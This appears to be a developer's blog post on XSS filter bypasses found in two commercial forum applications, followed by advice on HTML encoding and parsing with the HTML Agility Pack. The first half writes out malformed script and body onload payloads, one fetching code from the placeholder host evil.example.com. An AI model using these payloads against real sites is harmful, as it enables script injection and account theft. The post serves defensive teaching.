In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither was effectively protected against this (the URL here is just a placeholder):
<script src="http://evil.example.com/evil.js"
Agh! All I did was remove the tag’s closing “>” character, and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.
If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically blocking the string “<script”, I could have written this:
<body onload="alert('I am evil script'); doEvilStuff();"
Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.
One of the applications was supposed to filter out all HTML, full stop. Putting images into this supposedly plain text was, of course, easy – just miss off the closing bracket of the <img> tag.
Rolling your own HTML filter
HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.
If you can get away with simply HTML-encoding *all* user input at the point of display, do that – it’s easy and very safe, like this:
MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);
If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.
If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text – or whitelisted markup – from any string claiming to be HTML.
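A minimal sketch of that approach, assuming the HtmlAgilityPack NuGet package is referenced (the `ToPlainText` method name is mine, not the library’s):

```csharp
using System;
using HtmlAgilityPack;

class Sanitiser
{
    // Parses an untrusted string as HTML and returns only its text content,
    // discarding every tag, attribute, and script along the way.
    static string ToPlainText(string suspicious)
    {
        var doc = new HtmlDocument();
        doc.LoadHtml(suspicious);
        // InnerText walks the parsed tree and concatenates the text nodes,
        // so a malformed tag like "<body onload=..." is parsed, not echoed.
        return doc.DocumentNode.InnerText;
    }

    static void Main()
    {
        Console.WriteLine(ToPlainText("Hello <body onload=\"doEvilStuff();\" world"));
    }
}
```

Note that the extracted text should still be HTML-encoded at the point of display, exactly as above – the parser strips markup, but encoding is what makes the output safe to render.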
Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.